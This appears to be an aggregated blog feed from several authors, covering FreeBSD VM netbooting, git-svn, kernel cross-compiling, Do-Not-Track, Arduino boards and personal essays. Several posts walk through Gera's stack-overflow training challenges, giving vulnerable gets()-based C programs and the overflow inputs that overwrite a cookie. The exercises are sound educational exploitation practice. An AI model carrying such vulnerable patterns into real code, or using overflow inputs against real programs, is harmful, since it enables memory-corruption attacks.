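#include <unistd.h>
#include <stdlib.h>

/* Fallback seed when /dev/random is unavailable: pid and time only.
 * Still weak entropy, but no undefined behavior for the compiler to
 * optimize away. */
void seed_fallback(void)
{
	struct timeval tv;

	gettimeofday(&tv, NULL);
	srandom((unsigned long)(getpid() << 16) ^ tv.tv_sec ^ tv.tv_usec);
}
```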

    In a brief survey of other libraries I noticed similar issues. I will attempt to notify the vendors.

    It should be obvious, but undefined behavior is undefined and can't be relied on to ever give a sensible result.

    1. random.c r165903 (line 316)
    2. rand.c r241046 (line 131)
    3. FreeBSD clang version 3.1 (branches/release_31 156863) 20120523 compiled with -O2 or -O3
    4. gcc46 (FreeBSD Ports Collection) 4.6.4 20120608 (prerelease) compiled with -O2
    5. gcc (GCC) 4.2.1 20070831 patched [FreeBSD] compiled with -O3
    6. sections and of ISO9899
    7. svn commit r241373
    Edit 2012-10-10: updated the paragraph referring to the undefined behavior of volatile.

    by Eitan Adler at October 10, 2012 09:08 AM

    October 09, 2012

    Eitan Adler

    Some git-svn notes

    When working with a Subversion repository I often miss git features. However, it is possible for git to speak the Subversion protocol:

    Cloning the initial repository

    $ git svn clone svn://

    Resuming an interrupted git svn clone

    It is really annoying when you start a git svn clone process overnight and come back to find that it stopped in the middle. Luckily, there is a really simple way to recover - without spending hours to redownload what you already have.

    $ git svn fetch
    $ git svn rebase

    Committing the final patch

    There are a lot of workflows for this, but I prefer the cherry-pick approach:

    $ git checkout master
    $ git svn rebase
    $ git cherry-pick commit-id
    $ git svn dcommit

    by Eitan Adler at October 09, 2012 11:56 AM

    NFS Mount Network Booting VirtualBox

    In order to test modifications to the FreeBSD kernel, I would like to boot a diskless virtual machine. The goal is to be able to quickly test changes I make without needing to recreate the VM each time, or run the installation procedure inside of the VM.

    You can elect to put the root anywhere you want. For this example, I will be using /home/vm as the root of the virtual machine.

    There are a few aspects to this:

    • The filesystem that will be booted.
    • VirtualBox setup
    • Virtual machine setup
    • DHCP server
    • Host setup

    Filesystem Installation

    1. Create the distribution:

      cd /usr/src
      make installworld installkernel distribution DESTDIR=/home/vm
    2. Create the /conf directory used for diskless boot. See /etc/rc.initdiskless for details.

      # cd /home/vm/
      # mkdir -p conf/base/etc
      # cd conf/base/etc
      # cat diskless_remount
      # cat fstab
      md /tmp mfs -s=30m,rw 0 0
      md /var mfs -s=30m,rw 0 0
      # cat md_size

    VirtualBox Setup

    Create a "host-only" interface with DHCP disabled. To do this:

    1. Open up the preferences screen and go to the "network" tab.
      screenshot of the preferences screen
    2. Create a new host-only network (the green plus on the right).
      screenshot of the network preferences screen
    3. Disable the DHCP Server.
      screenshot of the host only network DHCP screen
    4. Select an IP Address in the range your VM will have.
      screenshot of the host only network preferences screen
    5. Note that the DHCP server will continue to run until killed or the machine rebooted:

      ## Note that you may kill too much here. Be careful.
      # pgrep -fl DHCP
      # pkill -15 DHCP

    Create the Virtual Machine

    1. Create a new virtual machine. Make sure to select "FreeBSD - 64 bit". Note that you should create this machine without any disk (and ignore the warning at the end).
      filled in machine name and type screenshot
    2. Open up the virtual machine's settings
      default settings screenshot
    3. Select only the "Network" option under boot order (System->Motherboard->Boot Order). Also check "Hardware clock in UTC time."
      changed setting screen screenshot
    4. Under network select the Host Only Adapter created before. Under advanced options, change the adapter type to "PCNet-PCI II." Also make a note of the mac address of the virtual machine. It will be needed later.
      changed network setting screen screenshot

    DHCP Server

    For simplicity I opted to use a really simple DHCP server, dnsmasq:
    1. Install dnsmasq

      $ make -C /usr/ports/dns/dnsmasq install clean
    2. Configure dnsmasq to serve as a TFTP and DHCP server for the virtual machine interface. Modify /usr/local/etc/dnsmasq.conf:

      #Note that this mac address is the mac address of the vm noted earlier.
    3. Add this to /etc/dhclient.conf so that you can reference your virtual machine by name:

      prepend domain-name-servers;
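    For step 2, a minimal dnsmasq.conf might look like the following sketch; the interface name, addresses, MAC address, and TFTP root here are placeholder assumptions, not the original values:

```
# hypothetical values -- adjust to your host-only network and VM
interface=vboxnet0
dhcp-range=192.168.56.10,192.168.56.100,12h
# the VM's MAC address noted earlier gets a fixed IP
dhcp-host=08:00:27:00:00:01,192.168.56.10
dhcp-boot=pxeboot
dhcp-option=option:root-path,"/home/vm"
enable-tftp
tftp-root=/home/vm/boot
```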

    Host Setup

    1. Add the following to /etc/rc.conf:

      # Required for VirtualBox

      # Required for diskless boot

      # NFS Exports
    2. Add the directory to /etc/exports:

      /home/vm -ro -alldirs -network -maproot=root
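    The rc.conf lines elided in step 1 would be along these lines (a sketch using standard FreeBSD knobs; the original's exact list is unknown):

```
# Required for VirtualBox
vboxdrv_load="YES"
vboxnet_enable="YES"

# Required for diskless boot / NFS exports
rpcbind_enable="YES"
nfs_server_enable="YES"
mountd_enable="YES"
```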

    Now you are all set. Just boot the virtual machine from VirtualBox and watch it go!

    1. Note that the network is RFC 1918 private address space.

    by Eitan Adler at October 09, 2012 11:56 AM

    September 26, 2012


    Hypnotoad SVG

    Hypnotoad is all over the internet, by and large depicted in tiny animated GIFs with horrible compression artifacts and other flaws. Behold Hypnotoad in its full glory: a lossless animated SVG. You can now scale Hypnotoad to unimaginable dimensions without doing it injustice - ALL GLORY TO THE HYPNOTOAD


    by dotCOMmie at September 26, 2012 02:47 AM

    February 18, 2012

    Nate Berry

    Super Star Trek in Python

    OK kids, make sure you have python installed so you can fire photons in this python remix of the classic Fortran Super Star Trek terminal game from the mid 70s. I played this game (poorly) in High School and had gotten frustrated trying to run the original Fortran version a while ago. Turns out […]

    by Nate at February 18, 2012 09:03 PM

    February 06, 2012

    Nate Berry

    Superbowl for paying customers only

    OK, so I’m not a sports fan, but I admit that I did *try* to watch the Super Bowl since it’s supposedly the American thing to do. Since I don’t pay for cable TV at $100 a month, I don’t get any of those cable channels showing the game, but thought I’d be able to get […]

    by Nate at February 06, 2012 01:51 AM

    February 01, 2012

    John Lutz

    Love is Not.

    Love is Not.
    Love is not usually something you discuss, but for all intents and purposes it can be best explored by what it is not. Remember, this is no definition, but merely a guideline of observation and experience in this Life.

    Love is not Wisdom. No one defines Love in a book, or yet in the smallest of sayings or even this article. It goes far beyond the hottest potential of that which burns and has no limit in its temperature.

    Love is not Symbolization. Love cannot be contained in or evoked through a word, a letter, a Book or in some manner of Symbol that is bound or not bound by this Earthly Sphere.

    Love is not Complex. A Hymn or Chant may prevent mental disturbance but Love is nowhere in sight.

    Love is not Life. All Life is not Love, but is supported as such. Free will lets you choose. The fallen know this.

    Love is not Man. It cannot be tied down to just one type of life form. There are many sentient beings , even just here on Earth, that are not just Homo Sapien who practice love, even for Man, himself. It can be also noted that Man was also not just Homo Sapien in his/her history as well.

    Love is not Power. Partially speaking, Love can be powerful thing, but it does not support a dominion over others or anything else.

    Love is not Joy. Cause and effect. Don't confuse the two.

    Love is not Glory. You can have too much Glory, but not enough Love.

    Love is not a Feast. Promised a feast is only a simple tie of the knot of your biological needs. If an Elephant or Dolphin or Whale or Other who is Sentient and you eat one, does this constitute Love?

    Love is not the rendition of Money or goods. Money isn't even form, it changes, it is superfluous, and as such can be used for the ten million thousand evils at Man's hand.

    Love is not by Command or Talent. If someone knows when a good day to wear Jeans is or perhaps when the right time to snap their fingers is; Love never takes this into account.

    Love is not Partial. If Love was partial to, say a certain type of friendly person, there would be no balance. Thus War.

    Love is not All things. Life is all, through the support of Love. But most things can turn, invert in on itself and destroy the Love of that which is.

    Love is not Control. By definition of retention, Union is destroyed. There is only Control where there is Chaos.

    Love is not Respect. While some Respect may be Loving; it has many forms. Respect is not required for Love.

    Love is not Spirituality. Each of us has a spirit, even the most antithetical to what we know as Not Love.

    Love is not an Institution. No matter where you go there you are.

    I devote this to my Mom.
     -John L

    by JohnnyL at February 01, 2012 07:16 AM

    January 31, 2012

    John Lutz

    Earth: Our Home

    Here is a simple guideline you can use in your daily life in working together in harmony with the planet.

    * Recycle
    recycle as much as you can, it's easy. The only payment you make is temporary room for items before they get shipped out to the appropriate retainer.

    More than likely it's usually a choice between (everyday wear and tear):

    * Cardboard (includes paper)
    * Plastic

    I find that while consuming, these two materials are most prevalent.
    Cardboard is from tree pulp; plastic has a lifetime of thousands of years, and when it finally degrades it'll be in the form of small pellets (non-decomposable).

    More unusually you'll be dealing with:
    * Electronics
    * Metal
    * Styrofoam
    * Clothing
    * Wood

    things such as wood and cloth degenerate, so no need to worry about them till the last. The clothing should be used as rags before throwing out. is a good place to start for salvaging
    everything from paint to computers/electronics/monitors.

    If you only have a phone: 1-800-CLEANUP.

    * drive less (think ahead). If you notice all the people out driving during working hours and haven't asked yourself why, it's because we are all consuming. By this we are degrading our planet. Think about your planet. We are the stewards and have the responsibility of protecting it.

    * See if it's possible with your company to telecommute (I know this may be hard, but if you're invested or have more years onboard it's a lot easier). Many jobs are applicable in this form. This especially holds true if you commute 1 1/2 hours to work and don't talk to anyone there. (Otherwise known as common Information Technology work.)
    * If you can, try to move close to your work, while unrealistic it's a small goal, that if you can make will help out tremendously.

    * beware of the elements; it's a good idea to get a container for oil if you're changing it. That means not dumping it carelessly.

    * use less: the more you use, the more you abuse. Try to make sure the appropriate amount of material is used for the job, not any more. That includes just about every resource you can think of.

    * Electricity may be seemingly ubiquitous, but it still puts strain on the carrying equipment, not to mention your wallet. Use only what you need. A good habit is to turn off the lights every time you leave a room.

    * Computers use up many watts, especially the new models; the more components you have, the more electricity is used. It is recommended that you use the power-saving capabilities of the computer and always shut it off at night.

    * buy less: a majority of the stuff which is bought can last longer if one takes care of it. Earth is not a fad. If it works, use it; if you don't have enough to make yourself optimal, buy it, but make it last.

    * Portable devices: These are good if you have a disability and you cannot retain information! They usually wind up in the dump, and typically you'll lose the information because the batteries go dead!

    Contact the email address below if you want more information on how to get rid of those portable machines and their batteries for good. (And yes, for many the computer is just a crutch)

    * Dining. If you like playing Russian roulette with what you consume physically, then you like to dine out! If available, ask for a content chart (Taco Bell and McDonald's surprisingly have these). A good suggestion is just to buy from the supermarket. It's also wise to become a vegetarian. Many famous people like Einstein and Leonardo da Vinci supported vegetarianism. Much of the meat that you eat will make you become sluggish and add health problems (apart from smoking and taking drugs, eating meat is the one thing that new doctors ask you about when you first sign up with them). Vegetables and fruits get their energy from the primary source: the Sun. Be wise with what you ingest. A majority of the meat raising and milk production is done in harsh and violent environments that leave our animals in terror, which you eventually ingest. If you do buy milk, buy organic. Same with eggs too.

    If you would like to add to this guideline sheet or help inform others on conservation for the planet, then by all means do so. (c) copyright 2007 John Lutz. If you have any questions or would just like to talk please contact me at: JohnnyLutz[[at]]

    "By helping the Earth, you help yourself."

    by JohnnyL at January 31, 2012 09:43 AM

    August 24, 2011


    Installing and using egit, the eclipse git plugin

    I use the latest PDT version of eclipse (Helios) as my IDE of choice, and have used the built-in cvs and add-on svn-kit plugins for version control for many years. When I first started using git, I guess I didn't think there was a git plug-in for eclipse or that the ones I saw just weren't stable enough, so I just went to the command line to do the git work then back to eclipse to continue coding. Now that Drupal has moved their whole repository from cvs to git, I thought it might be time to add the e-git plug-in to eclipse so that I don't have to leave eclipse to get git work done.


    by lipcpro at August 24, 2011 03:54 PM

    June 25, 2011

    Eitan Adler

    Gera's Insecure Programming: Warming up to the stack #1

    Gera has a series of "challenges" designed to help teach people the basics of exploitation. The goal is to provide some input to the program to get it to output "you win!"

    The code for the first one:

    /* stack1.c
     * specially crafted to feed your brain by gera
     */
    #include <stdio.h>

    int main() {
       int cookie;
       char buf[80];

       printf("buf: %08x cookie: %08x\n", &buf, &cookie);
       gets(buf);
       if (cookie == 0x41424344)
          printf("you win!\n");
    }

    At a lower level
    The assembly for the above program generated by clang on FreeBSD with -O3 -fomit-frame-pointer (comments are my addition)
       pushl %esi
       subl $100, %esp
       leal -8(%ebp), %eax
       movl %eax, 8(%esp)
       leal -88(%ebp), %esi
       movl %esi, 4(%esp)
       movl $.L.str, (%esp)
       call printf
       movl %esi, (%esp)
       call gets      ; note that gets does not have a length argument
       cmpl $1094861636, -8(%ebp)
       jne .LBB0_2    ; we will come back to this
       movl $str, (%esp)
       call puts
       xorl %eax, %eax
       addl $100, %esp
       popl %esi

    Break it down
    The program starts off by creating two variables: a cookie and a fixed-size buffer. It then prints out the addresses of buf and cookie.
    Then the fun starts: gets(3) is called to put data in buf. gets is a very insecure function. To quote the man page:
    The gets() function cannot be used securely. Because of its lack of bounds checking, and the inability for the calling program to reliably determine the length of the next incoming line, the use of this function enables malicious users to arbitrarily change a running program's functionality through a buffer overflow attack.
    Then we have a check to see if cookie is equal to some value. We can convert this value from an integer to printable ascii(7) characters: 0x41 is A, 0x42 is B, etc. So we want to set the cookie to "ABCD". There is one little gotcha: the machine I'm using (and most likely yours) is little endian, so we actually need to reverse the order of our text.
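    You can convince yourself of the byte order with a few lines (my sketch, not from the original post):

```c
#include <string.h>

/* Copies the four bytes of cookie into out in memory order and
 * NUL-terminates it; on a little-endian machine 0x41424344 yields "DCBA". */
void cookie_bytes(unsigned int cookie, char out[5])
{
	memcpy(out, &cookie, sizeof cookie);
	out[4] = '\0';
}
```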
    What should we actually do?
    There is no guarantee of how C variables are stored but we can make a good guess. On my system sizeof(int) is 4 and sizeof(char) is always 1, so our stack (highest address first) probably looks like:
    cookie most significant byte
    cookie byte 2
    cookie byte 3
    cookie least significant byte
    buf[79]
    ...
    buf[0]
    Let's try it!

    The string we want to insert is
    xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxDCBA. 80 random characters to fill the buffer and then DCBA to fill the cookie (the important part)

    [eitan@ByteByte ~/gstack ]%echo $(jot -b x -s '' 80)DCBA > exploit 
    [eitan@ByteByte ~/gstack ]%./a.out <exploit
    buf: bfbfea48 cookie: bfbfea98
    you win!
    A different way:
    Let's say we didn't have the source and that this was some music player we wanted to (legally) jailbreak. If you disassemble the file you can change the jump address or just remove the jump altogether to avoid the check:
    [eitan@ByteByte ~/gstack !130!]%./a.out
    buf: bfbfea48 cookie: bfbfea98
    you win!
    Some notes

    No serious programmer uses gets anymore and real exploits are likely to be harder to create due to OpenBSD's w^x protection, gcc's stack protector, and good coding habits. This was just an intro to the art of exploitation. I plan on following with either the next warming up to the stack challenge or the "esoteric" format string vulnerabilities.

    Update 12/26/10 clarified the goal of the exploit. Explained what "jot" does.

    by Eitan Adler at June 25, 2011 04:15 PM

    Repeating characters in multiple languages

    A friend of mine asked me how to repeat a string a specified number of times. There are a few times when one wants to do this when programming. Here is the "repeating operator" in various languages. I tried to use an operator when possible - but in certain cases I used a function. In all cases I repeat a string followed by a newline.
    The BSDs
    for i in $(jot 5);
    do echo -n "Hi";
    done
    echo "";

    Most Linux distributions
    for i in $(seq 1 1 5);
    do echo -n "Hi";
    done
    echo "";

    Perl
    print "-" x 10;
    print "\n"

    Python
    "ab" * 10
    Output: 'abababababababababab'
    R
    paste(rep("Hi",5), collapse='')
    [1] HiHiHiHiHi
    Ruby
    print "-" * 10;
    print "\n"

    Tcl
    string repeat "Hi" 5
    zsh
    repeat 5 printf 'abc';
    echo "";

    update 5/30/11: Thanks to Hans I found out that jot is not POSIX. Also fixed formatting.

    by Eitan Adler at June 25, 2011 04:15 PM

    The Usefulness of the X-Do-Not-Track Header

    Do-Not-Track [0] is a recent proposal by the FTC [1] to deal with the problem of users being “tracked” by advertisers. It consists of adding a new HTTP header [2] to page requests that indicates that the user is “opting out” of being “tracked”.
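    A request carrying the opt-out would look roughly like this (a sketch; as footnote [2] notes, the header's name varied across drafts):

```
GET /index.html HTTP/1.1
Host: example.com
X-Do-Not-Track: 1
```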

    The proposal is backed by a number of major players, including Mozilla [3], the Electronic Frontier Foundation [4], Wladimir Palant (the maintainer of AdBlockPlus) [5], and Giorgio Maone (the author of NoScript) [6].

    Is this a good idea? Does it solve any existing problems?

    One important factor to consider is that everyone has a different understanding of the concept of “tracking”. If a user has the header set but logs in to a service is there a difference? What if the user closes the browser in between sessions? Can the service remember who logged on last? Can a bank track a user’s visits for security purposes? What about a quiz website tracking participation to prevent cheating? And these are the simple questions. The definition of the word ‘tracking’ is not officially established.

    Google claims it anonymizes IP addresses [7], but the “anonymization” only involved clearing the last octet of the user’s IP address [8]. Is that considered tracking? Who decides? You? Google? The government?

    Even if we came to a shared definition of what it means to “track”, how can one prove if tracking is done or not?

    Let’s imagine that the US government enacts a law requiring websites to follow this header based on this elusive definition of “tracking”. What about servers outside the US? How would their activity be handled? What about a foreign user accessing a US-based website? The reverse? What if different jurisdictions came to two mutually exclusive definitions of “tracking”?

    Furthermore, what if websites began to deny service to users that used the X-Do-Not-Track header? Browsers would be forced to remove the header in order to browse the web - effectively nullifying the header’s original purpose.

    Arvind Narayanan [9] says that “Examining ad blocking allows us to predict how publishers, ... assuming DNT is implemented as a browser plug-in, ad blocking and DNT would be equivalent ... ad blocking would result in a far greater decline in revenue than merely preventing behavioral ads. We should therefore expect that DNT will be at least as well tolerated by websites as ad blocking.” This analysis assumes that the header will be in a plugin or optional setting. If every browser implements this header by default, as they should to attract more users, a much larger percentage of people will be opting out than with ad-blockers today.

    What if the law disallowed differing service for those with or without the header? What would be the point? It would make sense to simply disallow “tracking” for all websites, which would make the header moot. Of course, this idea is subject to the same questions as asked above.

    Instead of focusing on silly request-based ideas for websites, browser vendors should be working on fixing the privacy holes that have already been found. Some examples include Firefox’s fix for the CSS history leak, Internet Explorer’s anti-tracking features [10][11], and related instances.

    Browser vendors could also consider the idea of shipping their browsers with mini versions of ad-preventing software like AdblockPlus, NoScript [12], and RequestPolicy [11] that block major third-party advertisers such as DoubleClick. Of course this could become a cat-and-mouse game - and it may not be a good idea at all - but it would be more effective than the do-not-track header. Other options include appeasing advertisers with targeted advertising and behavior analysis that doesn’t violate user privacy; for examples see footnote [13].

    Quite simply, what we need is increased client-side awareness of the privacy implications of various features, and some form of control given to users over what data they transmit across the Internet about themselves.

    [2] Originally the header was “X-Behavioral-Ad-Opt-Out: 1 X-Do-Not-Track: 1” but the current version is now “X-DNT: 1” to save bandwidth
    [12] These particular addons “break” websites by default, but they can be configured in such a way to limit the damage they cause.
    [13] See Profiling and targeting take place in the browser. The ad network is unaware of the user’s interests

    Thank you to JT very much for the sane editing and thoughts provided.

    by Eitan Adler at June 25, 2011 04:14 PM

    Warming up to the stack #3

    #include <stdio.h>

    int main() {
      int cookie;
      char buf[80];

      printf("buf: %08x cookie: %08x\n", &buf, &cookie);
      gets(buf);
      if (cookie == 0x01020005)
        printf("you win!\n");
    }

    Not much is new here. We exploit this the same way we did the first two, except that we have a null character (ctrl-@) in the cookie.

    I want to point out one thing that I didn't mention on my previous posts. The address of cookie and buf are printed out so we don't really need to "guess" where they are on the stack. I ignored this before, because in real programs, the address values are rarely printed out.
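    Since it is awkward to type a NUL at the shell, one option (my sketch, not from the original post) is to write the exploit file programmatically; for cookie 0x01020005 the little-endian byte sequence is 05 00 02 01:

```c
#include <stdio.h>

/* Writes 80 filler bytes followed by the cookie bytes 05 00 02 01;
 * a file, unlike a terminal, holds the embedded NUL without trouble. */
int write_exploit(const char *path)
{
	FILE *f = fopen(path, "wb");
	if (f == NULL)
		return -1;
	for (int i = 0; i < 80; i++)
		fputc('q', f);
	const unsigned char cookie[] = { 0x05, 0x00, 0x02, 0x01 };
	fwrite(cookie, 1, sizeof cookie, f);
	fputc('\n', f);
	return fclose(f);
}
```

    Redirect the resulting file into the program as before: ./a.out <exploit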

    by Eitan Adler at June 25, 2011 04:14 PM

    Warming up to the stack #2

    #include <stdio.h>

    int main() {
      int cookie;
      char buf[80];

      printf("buf: %08x cookie: %08x\n", &buf, &cookie);
      gets(buf);
      if (cookie == 0x01020305)
        printf("you win!\n");
    }

    Gera's challenge #2 is exactly the same as the first one other than the cookie we need to write. What makes this interesting is that the characters are not "printable" (they don't have a symbolic representation).

    There are a few ways to deal with this:
    • Take a file similar to the original one and use a hex editor, like hexcurse(1), to manually modify it.
    • Use inline perl. perl -e 'print "q" x 80 . "\x05\x03\x02\x01"'
    • Directly enter the special characters using Ctrl+V followed by a Ctrl+key, where the key is 0x40 plus the value. This won't necessarily work on your terminal, since the terminal intercepts keys like Ctrl+C.
    %./a.out <exploit
    buf: bfbfe9e8 cookie: bfbfea38
    you win!

    by Eitan Adler at June 25, 2011 04:14 PM

    February 13, 2011


    Installing Git on a CentOS 5.5 server

    A lot of people are realizing the benefits of using a distributed version control system such as Git over Svn or Cvs. I won't be discussing the pros and cons, just how I got it installed on a CentOS 5.5 server. If you'd like to install git on a laptop/desktop, I suggest you follow the instructions for that at github; the link will redirect to the appropriate OS it detects you are using, COOL! That page also has many very useful git links in the sidebar.


    by lipcpro at February 13, 2011 07:53 PM

    January 24, 2011

    Tom "supertom" Melendez

    2011: A new year, a new gig.

    It’s been one hell of a year for me. Jaxon is now a year old and doing great. I got to spend a lot of time with my family, almost 6 weeks by my count. I did some traveling too: I was in Taiwan for two weeks in May; I spoke at IPC (Germany) in October, and traveled through Bavaria and met some great people. I did some really cool stuff at work. Again, it was a great year.

    But, I think as humans we ultimately can’t leave well-enough alone, and being human (yes, debatable), something needed to change. Due to some personal and professional reasons, I decided to leave Yahoo! to pursue other opportunities. I was there 3 1/2 years and I had some great times. I worked with really smart, passionate people and worked on projects with major impact. Yahoo! was a great experience for me – they moved me out here, gave me fun stuff to work on, allowed me to pursue my technical interests and even do some traveling, all on their dime. For that, I’m very sincere when I say, “Thanks.”.

    So, why did I have to leave? Well, to paraphrase a thoughtful colleague’s blog post, Yahoo! and I had reached a crossroad where I really couldn’t “add” to Yahoo! and pursue my current interests at the same time. There is plenty of work to be done, but for me to take it on would mean me putting aside my own aspirations. While I do believe that my interests and Yahoo!’s immediate needs will converge again one day, it’s just not today, and so, I needed to move on. With all of that said, I really, REALLY want to thank upper management for trying really, really hard to find a position for me that met my needs – Thanks.

    So, what’s next? How can one top working on the Number 1 News site in the world? Work on stuff in space, of course!

    I’m now the Senior Platform Software Engineer at Skybox Imaging. Skybox is a venture-backed startup that’s building satellites (yes, we literally build them in house) better, faster, cheaper and smaller than anyone has before. So what am I doing there? In short, I’m responsible (solely ATM) for storing, processing and serving all of the data (video, photos and text) we get from the satellites.

    This is an awesome opportunity for me for several reasons:

  • I’m building the Hadoop cluster, storage and serving layers from scratch, everything from design to deployment, and much of the code that runs on it.
  • Lots and lots of data, and using Hadoop to process image data is largely-uncharted water at this point.
  • Lots of code to be written – in addition to the above, I’m helping out the flight software team in building the encoder that converts the human readable command manifest into the bits that get radiated to the satellite.
  • This industry is completely new to me, which makes it fun and interesting. I know nothing about space, aeronautics or mechanical engineering. They’ve already let me have at it with some of the tools (they obviously don’t know me too well) and I haven’t hurt anyone yet.
  • And of course, there are the perks:

  • Kegerator
  • Ping-pong/Nerf Guns/Xbox/Team events – all the usual startup stuff
  • Only two miles from my place
  • I literally work with Rocket Scientists.
    It is going to be a fun year. We’ve got lots of cool toys to play with (we have our first satellite dish *inside* the office) and some serious $$$ behind us. Of course, I’ll miss working with my friends at Y!, but we’re all in the same town and I’m sure we’ll stay in touch. I wish Y! the best and do believe they are now on the right course – 2010 was a planning/design/initial implementation year and 2011 will further implement that vision. And I look forward to the day that Y! News publishes the article describing our first launch – look out for it!

    by supertom at January 24, 2011 04:38 PM

    November 15, 2010

    Jonathan Dahan

    open source hardware conference

    This is, first, a response to @JxA’s post about the OSHW Definition Draft and, second, just general thoughts brewing post-OSHW.


    Your definition of proto-hardware and hardware could be boiled down to ‘when do I start inviting the world to collaborate?’. It is a gray area, and you probably saw a lot more sharing of it at OSHW due to the mutual understanding and passion of the attendees (seriously, OSHW was such an awesome time!). Your ‘proto’ seems close to platform, ‘hardware’ close to proto + documentation, and ‘product’ close to hardware + usable software + full documentation. At such early stages in design these blur, as there is another type of consumer that has different expectations of ‘the product’.

    A while ago my father asked why open source wasn’t advertised. To make a long story short and relevant to this conversation, we agreed that the maker-consumer cares most about the hackability of a product - to the point that the product doesn’t really have to do anything out of the box. Seeing OSHW-stamped boxes would inform the maker: ‘hey, do not worry about hacking this thing, it’s gonna be easier and we encourage you to do so!’. This stamp should mean the same thing regardless of the stage of development of the product.

    I am not quite sure where I am going with this, just that although I like the direction your thoughts are going, describing something complex clearly necessarily requires a complex description. That is why this definition is taking a while to solidify (though it has ‘gelled’ a whole lot in the past few months).

    Defining the goals of the definition will bring about a clearer scope, which can definitely be found through discussion like this.

    If you don’t mind, I would like to link to this post and yours in the forum thread.


    * Outlining the goals of the OSHW definition will make it easier to describe complex things in a clear manner

    * One goal is that compliance should alert makers ‘Hack Me!’ ( though really, shouldn’t everything? )

    November 15, 2010 08:00 AM

    August 26, 2010


    Cross Compile with make-kpkg

    I got myself one of the fancy shmancy netbooks. Due to a habit and some hardware issues I needed to compile a kernel. The problem here, though, is that it takes forever to build a kernel on one of these things. No sweat, I'll just build it on my desktop; it'll only take 5-10 minutes. But of course there is a catch. My desktop is 64bit and this new machine has an Atom CPU which only does 32bit.

    The process for compiling a 32bit kernel on a 64bit machine is probably a lot easier if you don't compile it the Debian way. But this is not something I want to do: I like installing kernels through the package manager, and doing this type of cross compile using make-kpkg is not trivial. There are plenty of forum and email threads with people recommending a chroot or a virtual machine for this task, but that is such a chore to set up. So here is my recipe for cross compiling a 32bit kernel on a 64bit host without a chroot or VM, the-debian-way.

    1. Install 32bit tools (ia32-libs, lib32gcc1, lib32ncurses5, libc6-i386, util-linux, maybe some other ones)
    2. Download & unpack your kernel sources
    3. run "linux32 make menuconfig" and configure your kernel for your new machine
    4. clean your build dirs "make-kpkg clean --cross-compile - --arch=i386" (only needed on consecutive compiles)
    5. compile your kernel: "nice -n 100 fakeroot linux32 make-kpkg --cross-compile - --arch=i386 --revision=05test kernel_image". For faster compilation on multi-CPU machines, run "export CONCURRENCY_LEVEL=$((`cat /proc/cpuinfo |grep "^processor"|wc -l`*2))" first.
    6. At this point you have a 32bit kernel inside a package labeled for the 64bit arch. We need to fix this: run "fakeroot deb-reversion -k bash ../linux-image-". Open the file DEBIAN/control with vim/emacs and change "Architecture: amd64" to "Architecture: i386", then exit the bash process with Ctrl+D.
    7. That's it, now just transfer the re-generated deb to destination machine and install it.
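    Step 6 can also be done non-interactively. A minimal sketch, using deb-reversion's -k hook (which runs a command inside the unpacked package tree) with a sed one-liner instead of an interactive bash session; the .deb filename below is illustrative:

```shell
# Sketch: non-interactive variant of step 6. Instead of opening bash via -k
# and editing DEBIAN/control by hand, pass a sed one-liner as the hook; it
# rewrites the Architecture field in place. The .deb name is illustrative.
fakeroot deb-reversion -k \
  "sed -i 's/^Architecture: amd64$/Architecture: i386/' DEBIAN/control" \
  ../linux-image-2.6.32-custom_05test_amd64.deb
```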

    Many, if not all, of the ideas for this process came from reading email threads; the comments made by Goswin von Brederlow were particularly helpful, thanks.

    by dotCOMmie at August 26, 2010 02:09 AM

    July 21, 2010

    Jonathan Dahan

    arduino buyers guide

    Some recommendations, since the AVR scene has exploded and Arduino-compatible boards rock. I recommend buying from the manufacturer to support them, if they are available in your country. Shield compatibility is great, especially if you are starting out. Basic is recommended for your first Arduino; advanced is not necessarily more advanced, but an alternative if you have specific requirements.

    $40
    * Basic: Freetronics TwentyTen (a Duemilanove + mini USB connector + built-in proto board)
    * Advanced: Illuminato Genesis (42 I/O pins, sweet black PCB with 10 bright white LEDs, 64K of code space)

    $30
    * Basic: Duemilanove (the official board is more flexible, since you can change the Atmel chip)
    * Advanced: Seeeduino (based off the Diecimila, not the Duemilanove, and improves on the form factor)

    $20
    * Basic: Arduino Pro (smaller and cheaper, but missing USB; you will need a serial-to-USB cable, which is ~$15)
    * Advanced: BBB ($4 cheaper than the Pro, and you get to build it yourself!)

    July 21, 2010 07:00 AM

    July 05, 2010

    Jonathan Dahan


    * Reduce friction for contribution and consumption (see open source development)
    * Offer alternatives to asymmetric balance of information (insurance vs. savings communes)
    * Keep in mind the elasticity and limit the numbers (private trackers, constitution)

    July 05, 2010 07:00 AM

    July 02, 2010

    Jonathan Dahan


    Going through the speaker list at The Next HOPE, and seeing how many notes I have written in tasque, I realize that I consume more than I can follow up on. Prioritization aside, just getting this down for posterity is important, and what better way than to publish random notes on the internet? (Seriously, I need a better scheme than this, preferably one that follows the antihacking idea I posted earlier.) This post will probably be split into a few later, but it's better to push early and often, before this stuff slips away.


    Great convention, organized by JonathanD.
    * Lots of talks involved open education, not just in using FOSS technologies for IT infrastructure, but to take advantage of real-world exercises, contributing to code/documentation/art/testing in projects that people actually use.
    * hkcmp
    * freebay / nomoola
    * collectivefoundation
    * publiccollectors

    From the talk on community management given by kloeri:
    * define what you want from the community early on
    * changing direction is ok as long as everyone is moving in the same direction
    * leave trivial bugs as low-hanging fruit
    * be open about exploitation of users to turn them into contributors
    * take “bad” patches to illustrate ease of contribution
    * attribute contributions even if the contributor did not do any of the real work
    * upstream gets contributors <> contributors get credit and learning
    * users can socially engineer the developers to do work for them! (just pose the question as an interesting problem)
    * for a good example, see BFS from Con Kolivas

    POSSE:
    * productively lost is a good thing; stumbling around means you have a greater learning potential
    * RIT has a good FOSS movement going on, check out the foss@rit projects page!
    * Professor Stephen rocks, and so does the OLPC

    Openhatch, a job site++ for FOSSheads:
    * Would be cool to add mission badges, integration with statusnet

    * - git history of laws!
    * Both built on pygears < turbogears2 < moksha


    Music to check out - stuff that sounds good at first glance but I should consider putting into my regular rotation / radio show.

    * fabriclive 50
    * faded paper figures
    * clermont
    * frog eyes
    * slothbeat kids
    * icarus himself
    * hyperbubble
    * the humms might have a song that flaming lips took the chord progression for ‘I dont know where the sunbeams end and the starlight begins…’


    It's important to document work. Really, really important. Here is a crappy start.

    * Get pics from Prof. Jose
    * Fix arduinome
    * Build Problem Light (have a good chassis…)

    July 02, 2010 07:00 AM

    May 14, 2010


    Versionless Distro

